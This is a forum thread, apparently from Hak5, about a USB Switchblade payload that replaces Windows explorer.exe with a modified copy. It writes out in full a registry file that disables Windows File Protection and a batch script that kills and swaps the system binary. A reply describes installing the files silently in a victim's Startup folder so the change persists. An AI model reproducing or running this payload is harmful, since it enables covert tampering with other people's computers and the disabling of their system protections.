Jump to content

The USB Switchblade Hak5 Button


AndyzBong
 Share

Recommended Posts

I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button.

NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue.

MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER!

You will need 4 things (these all go in WIPCMD):

1. A registry file to import a key that disables Windows File Protection

2. A modified version of explorer.exe

3. A batch file to delay time when copying the modified explorer

4. A copy of Pskill

First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]

"SFCDisable"=dword:000001



[HKEY_CURRENT_USERSoftwareSysinternalsPsKill]

"EulaAccepted"=dword:00000001

Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify it's start button to whatever you want. Save the changes to explorer.exe Then create a batch file named blank.bat and a batch file named explorer.bat

Blank.bat will be blank (duh), and explorer.bat will have the following code:

@echo off

regedit.exe /s WIPCMDwfpskill.reg

pskill.exe explorer.exe

RENAME C:WINDOWSsystem32dllcacheexplorer.exe explorer.bak

COPY /y F:WIPCMDexplorer.exe C:WINDOWSsystem32dllcache

TYPE NUL | F:WIPCMDblank.bat /N /CY /TY,5 >NUL

COPY /y F:WIPCMDexplorer.exe C:WINDOWS

C:WINDOWSexplorer.exe

exit

Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go.

This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries.

Mad props to KarmikTrance.

Link to comment
Share on other sites

You can also give the file another name, like explorer2.exe, and then change that in the registry (not sure where it was anymore), so you wont have to disable the windows file protection.

Also, maybe you can add some more info on how to edit the explorer.exe file, for those who never did it before.

For the rest, it's really nice, I'm gonna include something like this in my payload :D

Link to comment
Share on other sites

In-order to modify explorer.exe you need a copy of ResHack (http://www.angusj.com/resourcehacker/).

The "Start" button resource is located in String Table : 38 : 1033. Simply edit the copy of explorer.exe in your WIPCMD folder and save the changes.

NOTE: If you are going to add the code I mentioned in the above post to your go.cmd payload, make sure that you add it as the last program to run. Since the code kills the explorer.exe process; it is NOT silent. I have decided to modify my own code and copy the essential files to the 'victim' Startup folder, so that the Start button modification takes place upon the next reboot, and the Switchblade can run silently.

Changing the Start Button

(http://www.overclockersclub.com/guides/xpstartbutton.php)

Disabling Windows File Protection

(http://www.microsoft.com/whdc/archive/wfp.mspx#ENAAC)

PsKill

(http://www.microsoft.com/technet/sysintern...ads/PsKill.mspx)

Detailing Windows Explorer with ResHack

(http://wint.virtualplastic.net/showtweak.php?tweak_id=56)

Detailing Windows Explorer with ResHack #2

(http://wint.virtualplastic.net/showtweak.php?tweak_id=75)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...